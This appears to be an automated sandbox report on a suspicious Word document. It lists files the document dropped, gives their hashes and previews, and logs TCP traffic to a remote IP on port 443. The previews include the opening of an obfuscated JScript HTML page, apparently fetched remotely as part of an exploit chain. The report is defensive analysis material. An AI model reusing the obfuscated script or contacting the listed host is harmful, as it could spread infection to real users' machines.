Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):131072
Entropy (8bit):0.28847987121721
Encrypted:false
SSDEEP:48:I39yCRBk2B05avmHBRbgEo8vTvPO4JyP6LaRrCDr7evivDH:K9yCL6Hwlm7VUPgWCbsQDH
MD5:E5AF351D93FC6BA388AB48ABD23907E0
SHA1:5D4145B35593C774D5F88A1997109E79496E3821
SHA-256:D42FB125C2C4BAE8CE74C54BD189F356B596582D3EA1CB96AB1532A586FAAA9B
SHA-512:D87BFEC3E1B73D65BC6D187CF4C6E69C1232A5F8CB203857CBD7FC6E577985E00DAA3C7696A6E50F57D124C0FDF8A10CAEFD4448D45C19EFCC21F82377F2F61D
Malicious:false
Reputation:low
Preview:......M.eFy...z@y...&zK.y.n1>..S,...X.F...Fa.q.............................y`.z.M.....5.k........5u..h..G...8.M.".A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{5B8C97A2-8D5D-4690-A237-D6E0C46FC601}.FSD

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):131072
Entropy (8bit):0.22169434281918624
Encrypted:false
SSDEEP:24:I3mLwnM0B34BGDcSDzqSZ/yLfLSOeSg8YGILLK5zvfEKwJwz1w3m8Md505fZmjS/:I3mUrBzMjPZ2nhIgf5xT
MD5:70560F4917331B2A17868068A1E9517E
SHA1:359ADBCC510241A6528A866A1EA3B361D6EF93AF
SHA-256:475591FE9EC37DCD8BDBDE7E426317FD418DFEABEE6CD0DD0477A2D01834D97E
SHA-512:F1250F280EB632638962459F43C5EF4DFE5A7FFDDE2284A434878B854FD58DB69F617C4AF0ACA5CA143AD5EDD2AB6307CBDD1E139E479971ED5997FFD5E4ECB9
Malicious:false
Reputation:low
Preview:......M.eFy...zR.m;x..J........S,...X.F...Fa.q.............................R..c.G...W............{JZ....I./....vAP>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):114
Entropy (8bit):4.003507387110244
Encrypted:false
SSDEEP:3:yVlgsRlzISUW2SblLyVSclQlpgkLVgdUal276:yPblzZRLBOwNgkyUu22
MD5:46245F9209D2C7C555186D14DDE809A1
SHA1:295F3AA146AF9E9C14506927280087F0919DD24E
SHA-256:21E9FB94661FAD6FB122E822A41EB27A2FDC31C0A526085D1A0BE3F732630FB9
SHA-512:918A990D8D30F9E3C37AB205EDC49E0967CD49BE5B377F99D8B219E89C0EB71F549295A603A31C2A576CC95AA023B21BDC3BBBDE00CAF6923B0BFF47020C463F
Malicious:false
Reputation:low
Preview:..H..@....b..q....]F.S.D.-.{.5.B.8.C.9.7.A.2.-.8.D.5.D.-.4.6.9.0.-.A.2.3.7.-.D.6.E.0.C.4.6.F.C.6.0.1.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1024203777.test[1].html

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:modified
Size (bytes):19364
Entropy (8bit):6.048046902595105
Encrypted:false
SSDEEP:384:hZJbWuYvXebbmk2RFGqL1vXipiIPq2L15j+h5i4rXgrE/M1eEScjy:hZJCXAbmDRFJ16pti2Lvaxb2rlW
MD5:C389F7EE1D9E6376B7D96E80D7A1FFE1
SHA1:2D0B931CF7CECDDDDB35457A5719353840F8CA66
SHA-256:8A01945C5951B6685768C155D938E7805B097477FCBB7E815FCB1CC26F1170DA
SHA-512:7DE15CF2ED560A6FF7E7FD5D3C8B0E4F13CA585BAB09D40E89785FC12F5B4C79D9F4CEC4034B3F40F4CA54ABAB100E27947867558DBC7876366A8B614EEA0FFC
Malicious:false
Reputation:low
Preview:<!docTYpe HTML>....<hTml>....<bODy>....<sCriPT LanGuagE="jSCript">....//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzoqklUBwmpAAmyTC3OoltUvPIazPwyA7LLQQOScaywq8vXyGIQVFlueILEfULpP4Ya8yidgcE4gp5FED44ecGfaqfILoETUg0KdPcIWZy0MJBORco5usI4ragZgRWBcU8JZl1kHzbXWa7GkyuGx4mNe3moKN6Ht1JNc4oE8NWRogo8JpmNPFcs7lNowfszWpyFQLv4EI8VufAHHhpDxPirOGsMAKmdcPVkdeEWjFrURX4zo8SYFayae4gEgPgUMJKduzfrnn6B6KSX4e4BwqIN3jCC8vWou5qguP7OZRGOV5DDCn5sgBbSjlq4BvBuPESiIvUNCkkrLpFIM4tP7enAsh0bTQZ21HZSjai6sDxOFaT4h2vawGljb57ZfSbVunbjqQgqiNIltPnnPEY9l4RT6QYmQ3BaDHwJJSHuumCkvI7mb9CvH5ifWHk0OGDY6H0ymiSXax280JLISLHf8MUZ0960E5chiJCUuF53uQEimTOd8LC9ythUib0bcaHHEuweN44h3jCFvo93mgLBSkDho8rXAm7bncbEnDLm9OJX4MXqYt8WFwxTSJ6bZg1wZyd1rinZNw1Lt8RIcVzxzWp6nd7bTLvZhTPoCbKMrvhT2Cng63IHLUkrzdKIXnhmLgLMUuqPnqmfAYUIC3SGytc2Bs7SO4Irf7qSOfH1JGdkwFRO23tgXlKuYrttjBZ4pIJtXuVTZhhTzIYHnZ0Jg8nkF75MBBThxmAQafR2jgMe0

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1024203777.test[1].html

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):19364
Entropy (8bit):6.048046902595105
Encrypted:false
SSDEEP:384:hZJbWuYvXebbmk2RFGqL1vXipiIPq2L15j+h5i4rXgrE/M1eEScjy:hZJCXAbmDRFJ16pti2Lvaxb2rlW
MD5:C389F7EE1D9E6376B7D96E80D7A1FFE1
SHA1:2D0B931CF7CECDDDDB35457A5719353840F8CA66
SHA-256:8A01945C5951B6685768C155D938E7805B097477FCBB7E815FCB1CC26F1170DA
SHA-512:7DE15CF2ED560A6FF7E7FD5D3C8B0E4F13CA585BAB09D40E89785FC12F5B4C79D9F4CEC4034B3F40F4CA54ABAB100E27947867558DBC7876366A8B614EEA0FFC
Malicious:false
Reputation:low
Preview:<!docTYpe HTML>....<hTml>....<bODy>....<sCriPT LanGuagE="jSCript">....//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzoqklUBwmpAAmyTC3OoltUvPIazPwyA7LLQQOScaywq8vXyGIQVFlueILEfULpP4Ya8yidgcE4gp5FED44ecGfaqfILoETUg0KdPcIWZy0MJBORco5usI4ragZgRWBcU8JZl1kHzbXWa7GkyuGx4mNe3moKN6Ht1JNc4oE8NWRogo8JpmNPFcs7lNowfszWpyFQLv4EI8VufAHHhpDxPirOGsMAKmdcPVkdeEWjFrURX4zo8SYFayae4gEgPgUMJKduzfrnn6B6KSX4e4BwqIN3jCC8vWou5qguP7OZRGOV5DDCn5sgBbSjlq4BvBuPESiIvUNCkkrLpFIM4tP7enAsh0bTQZ21HZSjai6sDxOFaT4h2vawGljb57ZfSbVunbjqQgqiNIltPnnPEY9l4RT6QYmQ3BaDHwJJSHuumCkvI7mb9CvH5ifWHk0OGDY6H0ymiSXax280JLISLHf8MUZ0960E5chiJCUuF53uQEimTOd8LC9ythUib0bcaHHEuweN44h3jCFvo93mgLBSkDho8rXAm7bncbEnDLm9OJX4MXqYt8WFwxTSJ6bZg1wZyd1rinZNw1Lt8RIcVzxzWp6nd7bTLvZhTPoCbKMrvhT2Cng63IHLUkrzdKIXnhmLgLMUuqPnqmfAYUIC3SGytc2Bs7SO4Irf7qSOfH1JGdkwFRO23tgXlKuYrttjBZ4pIJtXuVTZhhTzIYHnZ0Jg8nkF75MBBThxmAQafR2jgMe0

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2EF4F663.html

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):19364
Entropy (8bit):6.048046902595105
Encrypted:false
SSDEEP:384:hZJbWuYvXebbmk2RFGqL1vXipiIPq2L15j+h5i4rXgrE/M1eEScjy:hZJCXAbmDRFJ16pti2Lvaxb2rlW
MD5:C389F7EE1D9E6376B7D96E80D7A1FFE1
SHA1:2D0B931CF7CECDDDDB35457A5719353840F8CA66
SHA-256:8A01945C5951B6685768C155D938E7805B097477FCBB7E815FCB1CC26F1170DA
SHA-512:7DE15CF2ED560A6FF7E7FD5D3C8B0E4F13CA585BAB09D40E89785FC12F5B4C79D9F4CEC4034B3F40F4CA54ABAB100E27947867558DBC7876366A8B614EEA0FFC
Malicious:false
Reputation:low
Preview:<!docTYpe HTML>....<hTml>....<bODy>....<sCriPT LanGuagE="jSCript">....//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzoqklUBwmpAAmyTC3OoltUvPIazPwyA7LLQQOScaywq8vXyGIQVFlueILEfULpP4Ya8yidgcE4gp5FED44ecGfaqfILoETUg0KdPcIWZy0MJBORco5usI4ragZgRWBcU8JZl1kHzbXWa7GkyuGx4mNe3moKN6Ht1JNc4oE8NWRogo8JpmNPFcs7lNowfszWpyFQLv4EI8VufAHHhpDxPirOGsMAKmdcPVkdeEWjFrURX4zo8SYFayae4gEgPgUMJKduzfrnn6B6KSX4e4BwqIN3jCC8vWou5qguP7OZRGOV5DDCn5sgBbSjlq4BvBuPESiIvUNCkkrLpFIM4tP7enAsh0bTQZ21HZSjai6sDxOFaT4h2vawGljb57ZfSbVunbjqQgqiNIltPnnPEY9l4RT6QYmQ3BaDHwJJSHuumCkvI7mb9CvH5ifWHk0OGDY6H0ymiSXax280JLISLHf8MUZ0960E5chiJCUuF53uQEimTOd8LC9ythUib0bcaHHEuweN44h3jCFvo93mgLBSkDho8rXAm7bncbEnDLm9OJX4MXqYt8WFwxTSJ6bZg1wZyd1rinZNw1Lt8RIcVzxzWp6nd7bTLvZhTPoCbKMrvhT2Cng63IHLUkrzdKIXnhmLgLMUuqPnqmfAYUIC3SGytc2Bs7SO4Irf7qSOfH1JGdkwFRO23tgXlKuYrttjBZ4pIJtXuVTZhhTzIYHnZ0Jg8nkF75MBBThxmAQafR2jgMe0

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E5395CD.jpg

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 600x600, frames 3
Category:dropped
Size (bytes):22248
Entropy (8bit):7.567520825394468
Encrypted:false
SSDEEP:384:ma1KN3h8oGT1TS/TZs/r4VB5LuCBLAyB4KGO4v:7Zo21TSVur4z5Luy/BSF
MD5:66EBF5C50A28236AD77C5A306A4543E1
SHA1:F6EAA2DF964C95A2EB044AA94F5A691C1752E4B8
SHA-256:E80BFCC0066D4DFCE09EE172F5082C14D8EED957E8BF14B60FFC57C2F0BB1BDB
SHA-512:D79CD58FF50AA0725C334CCA8151B96AF1BA87E0D15034528055ED96D1B6686727B6A03C23BD069154B19BDC0E7F275A016A0F181C201F449A37AAD6D5568F0D
Malicious:false
Reputation:low
Preview:......JFIF.............C....................................................................C.......................................................................X.X..............................................................................................................................................................................................................................................................................................................................................................................c.t.{....................I..2...........Q....................Q..x........jQ.(......................i.........(.@...................Te..........b.b. ...................*2.r........1mJ1e......................m9w.......................r%FRc.............i.........(.@.............Ns.....?B...W;............%F[N]........-.F,.......%.^.%.s...~.9.P........_~.........*2.r........1mJ1e...|>..{...~.%.s...Rc/......._~.........*2.r........1mJ1e.....?S..>s.y...)

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC5065FC.html

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):19364
Entropy (8bit):6.048046902595105
Encrypted:false
SSDEEP:384:hZJbWuYvXebbmk2RFGqL1vXipiIPq2L15j+h5i4rXgrE/M1eEScjy:hZJCXAbmDRFJ16pti2Lvaxb2rlW
MD5:C389F7EE1D9E6376B7D96E80D7A1FFE1
SHA1:2D0B931CF7CECDDDDB35457A5719353840F8CA66
SHA-256:8A01945C5951B6685768C155D938E7805B097477FCBB7E815FCB1CC26F1170DA
SHA-512:7DE15CF2ED560A6FF7E7FD5D3C8B0E4F13CA585BAB09D40E89785FC12F5B4C79D9F4CEC4034B3F40F4CA54ABAB100E27947867558DBC7876366A8B614EEA0FFC
Malicious:false
Reputation:low
Preview:<!docTYpe HTML>....<hTml>....<bODy>....<sCriPT LanGuagE="jSCript">....//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzoqklUBwmpAAmyTC3OoltUvPIazPwyA7LLQQOScaywq8vXyGIQVFlueILEfULpP4Ya8yidgcE4gp5FED44ecGfaqfILoETUg0KdPcIWZy0MJBORco5usI4ragZgRWBcU8JZl1kHzbXWa7GkyuGx4mNe3moKN6Ht1JNc4oE8NWRogo8JpmNPFcs7lNowfszWpyFQLv4EI8VufAHHhpDxPirOGsMAKmdcPVkdeEWjFrURX4zo8SYFayae4gEgPgUMJKduzfrnn6B6KSX4e4BwqIN3jCC8vWou5qguP7OZRGOV5DDCn5sgBbSjlq4BvBuPESiIvUNCkkrLpFIM4tP7enAsh0bTQZ21HZSjai6sDxOFaT4h2vawGljb57ZfSbVunbjqQgqiNIltPnnPEY9l4RT6QYmQ3BaDHwJJSHuumCkvI7mb9CvH5ifWHk0OGDY6H0ymiSXax280JLISLHf8MUZ0960E5chiJCUuF53uQEimTOd8LC9ythUib0bcaHHEuweN44h3jCFvo93mgLBSkDho8rXAm7bncbEnDLm9OJX4MXqYt8WFwxTSJ6bZg1wZyd1rinZNw1Lt8RIcVzxzWp6nd7bTLvZhTPoCbKMrvhT2Cng63IHLUkrzdKIXnhmLgLMUuqPnqmfAYUIC3SGytc2Bs7SO4Irf7qSOfH1JGdkwFRO23tgXlKuYrttjBZ4pIJtXuVTZhhTzIYHnZ0Jg8nkF75MBBThxmAQafR2jgMe0

C:\Users\user\AppData\Local\Temp\{532AFB91-0C3D-4187-B83C-71D1E2833CCF}

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):131072
Entropy (8bit):0.025565480559654664
Encrypted:false
SSDEEP:6:I3DPcHPeAzRvxggLRjJ5zRXv//4tfnRujlw//+GtluJ/eRuj:I3DPylRXJ5FvYg3J/
MD5:DAA1E7900566342CE799FAC7815E1AFA
SHA1:27E2175C96A6DA395860F5B87CCA811689FA8DDC
SHA-256:986189E409F4D446FDBC10306068115FB41CC06EFF771F10277DFAA969AEE504
SHA-512:C18AE54E036937187ACEC39CFCF044F1D3FF96B1F420430C0BDF529D82CE0C465EF64B1701D332C8289291B9D3626F3391CA4C47D736F49B5D4571D28E257B26
Malicious:false
Reputation:low
Preview:......M.eFy...z@y...&zK.y.n1>..S,...X.F...Fa.q.............................'.W?.`E....FV..........5u..h..G...8.M.".....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{F2BDA7F7-D38F-4DB4-86AB-78594ACAB021}

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):131072
Entropy (8bit):0.025538895507565103
Encrypted:false
SSDEEP:6:I3DPctQUuy8RvxggLRXWvqq3RXv//4tfnRujlw//+GtluJ/eRuj:I3DP8Q/LWDvYg3J/
MD5:7B2A21167EF7DE65851D941C40B49C48
SHA1:3E31789057B2852AD41409CF2D5616E30A6A842B
SHA-256:414B8D143DD15A3996171CB9AB5BD4EFC45F7915F7A65AF25441FBCE891B7CE2
SHA-512:F042E28D1964CE4ED593886985AB4653F13784750540FAE3C07541EA1AF87DF0B4668906B1CABECC607620C597928B2F7AC0A47ACDDDDA7C7F3A7DF4F20A5F65
Malicious:false
Reputation:low
Preview:......M.eFy...zj....VF@.....a..S,...X.F...Fa.q..............................K ...H.G .E..r..........3-..L............................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):71
Entropy (8bit):4.683364951357434
Encrypted:false
SSDEEP:3:bDuMJlTUmYmX1V1QmYv:bCYUm91QmC
MD5:82ED92CE73F3F2C3BF91D4C76D3A4760
SHA1:CEFFA2857F6D2C211B5C08CEC9957C3EAF09289A
SHA-256:83E793DEA3EBA35BCC76F8F6511BA90804AC6C71EA4B6A13AA5EA52C94C800FD
SHA-512:17CAACAE5AF04A439529B6AE67BDAD4413CC60C2704748512D80B1485103863C917F158AB4673BCE9715EDB0FF206FDD3438B43E3C1EC92201009830290179C5
Malicious:false
Preview:[folders]..Templates.LNK=0..nnxPt0Yydv.LNK=0..[doc]..nnxPt0Yydv.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nnxPt0Yydv.LNK

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:57 2022, mtime=Tue Mar 8 15:45:57 2022, atime=Fri Sep 2 19:23:18 2022, length=23549, window=hide
Category:dropped
Size (bytes):1014
Entropy (8bit):4.583562059208682
Encrypted:false
SSDEEP:12:8s46FgXg/XAlCPCHaXMBzB/nPyX+WeOcfY5i+icvbIszaHDtZ3YilMMEpxRljK34:8e/XT89dqcZdeMszqDv3qcTu7D
MD5:B33A705BC9650B7E27987D428B6A003A
SHA1:E56964067C53E7D6D18A4378B44EB33409244099
SHA-256:F655020F81323BF78D21B11053DFD2C4B4F8C3673710F1854603736BDFC5ED7C
SHA-512:12704B16A4214246CA1F265BC993824B97624814443A205A999B35DB03B85AEFD8478BD2DA1EEEE8482BD86BA00AF51BB863B70D7FE9C65EC7A7602DAC99633D
Malicious:false
Preview:L..................F.... ....j..3...j..3....~......[...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT...Desktop.d......QK.XhT.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..[.."U. .NNXPT0~1.DOC..J......hT..hT..*...r.....'...............n.n.x.P.t.0.Y.y.d.v...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\887849\Users.user\Desktop\nnxPt0Yydv.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.n.n.x.P.t.0.Y.y.d.v...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......887849..........D_....3N...W...9G..N..... .....[D_....3N...W...9G..N..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.503835550707525
Encrypted:false
SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:false
Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

C:\Users\user\Desktop\~$xPt0Yydv.doc

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.503835550707525
Encrypted:false
SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:false
Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

Static File Info

General

File type:Microsoft Word 2007+
Entropy (8bit):7.956139045669752
TrID:
  • Word Microsoft Office Open XML Format document (49504/1) 49.01%
  • Word Microsoft Office Open XML Format document (43504/1) 43.07%
  • ZIP compressed archive (8000/1) 7.92%
File name:nnxPt0Yydv.doc
File size:23549
MD5:15b691f0c5d627e71fed8a5d34fb0328
SHA1:1c7cb38d8fc2f01a6331ade0fdf4cb9779a5ae74
SHA256:3833142e8b5a9174615c83c1165fa67bd9f46a230058adf8fc9cbb081bb92d30
SHA512:7e36de7c74b0b17d6a183125855da06a76c42e33506a76bc9450345d41267def85c0af982731a9d02c63ec80b7d8b425494ecde8cc2eb620012504801bdffb5d
SSDEEP:384:6wbSPfEjTkNesdDL667HzVutGCWyDVwZekDN81WqiJo9RxvrvmWqNWNX/wv3eSNU:9AEXkNegL6eHEnTwZvZ81Wqi+vrvUoXr
TLSH:3FB2D090C9B5045EE381E572D0887ACEF339F023C9A1A45C7332C5892BD759356A3A3B
File Content Preview:PK........4.!U...p`...T.......[Content_Types].xmlUT......c...c...c.T.N.0..#....U...B.i.,G.D......o.....7%B(4.m/..y.X..O.Zek.AZS.Q1$..n.4uI......BdF0e..d..L'.W...A..mBI.1.{J._.f....V*.5.x.5u......pxK.5.L.c. ..#Tl.b....&...H....WI.sJr..N.F.r....2.......@h.C

File Icon

Icon Hash:e4eea2aaa4b4b4a4

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Sep 2, 2022 13:24:11.893163919 CEST49171443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:11.893210888 CEST4434917182.202.173.45192.168.2.22
Sep 2, 2022 13:24:11.893363953 CEST49171443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:11.904119015 CEST49171443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:11.904153109 CEST4434917182.202.173.45192.168.2.22
Sep 2, 2022 13:24:12.106446028 CEST4434917182.202.173.45192.168.2.22
Sep 2, 2022 13:24:12.106641054 CEST49171443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:12.118447065 CEST49171443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:12.118464947 CEST4434917182.202.173.45192.168.2.22
Sep 2, 2022 13:24:12.119035959 CEST4434917182.202.173.45192.168.2.22
Sep 2, 2022 13:24:12.119194031 CEST49171443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:12.374012947 CEST49171443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:12.415391922 CEST4434917182.202.173.45192.168.2.22
Sep 2, 2022 13:24:12.447335005 CEST4434917182.202.173.45192.168.2.22
Sep 2, 2022 13:24:12.447459936 CEST4434917182.202.173.45192.168.2.22
Sep 2, 2022 13:24:12.447472095 CEST49171443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:12.447525024 CEST49171443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:12.460880041 CEST49171443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:12.460917950 CEST4434917182.202.173.45192.168.2.22
Sep 2, 2022 13:24:12.460963964 CEST49171443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:12.460978031 CEST49171443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:18.723443031 CEST49172443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:18.723489046 CEST4434917282.202.173.45192.168.2.22
Sep 2, 2022 13:24:18.724262953 CEST49172443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:18.724852085 CEST49172443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:18.724877119 CEST4434917282.202.173.45192.168.2.22
Sep 2, 2022 13:24:18.843628883 CEST4434917282.202.173.45192.168.2.22
Sep 2, 2022 13:24:18.843907118 CEST49172443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:18.858563900 CEST49172443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:18.858592987 CEST4434917282.202.173.45192.168.2.22
Sep 2, 2022 13:24:18.859313011 CEST4434917282.202.173.45192.168.2.22
Sep 2, 2022 13:24:18.877919912 CEST49172443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:18.919394016 CEST4434917282.202.173.45192.168.2.22
Sep 2, 2022 13:24:19.005238056 CEST4434917282.202.173.45192.168.2.22
Sep 2, 2022 13:24:19.005317926 CEST4434917282.202.173.45192.168.2.22
Sep 2, 2022 13:24:19.005392075 CEST49172443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:19.005716085 CEST49172443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:19.005734921 CEST4434917282.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.186294079 CEST49173443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:22.186338902 CEST4434917382.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.186407089 CEST49173443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:22.187663078 CEST49173443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:22.187686920 CEST4434917382.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.317841053 CEST4434917382.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.318058968 CEST49173443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:22.347040892 CEST49173443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:22.347084045 CEST4434917382.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.347831011 CEST4434917382.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.510687113 CEST49173443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:22.551390886 CEST4434917382.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.578166962 CEST4434917382.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.578267097 CEST4434917382.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.578324080 CEST49173443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:22.578752995 CEST49173443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:22.578778028 CEST4434917382.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.578821898 CEST49173443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:22.578836918 CEST4434917382.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.580574989 CEST49174443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:22.580615044 CEST4434917482.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.580679893 CEST49174443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:22.580837965 CEST49174443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:22.580856085 CEST4434917482.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.701263905 CEST4434917482.202.173.45192.168.2.22
Sep 2, 2022 13:24:22.701677084 CEST49174443192.168.2.2282.202.173.45
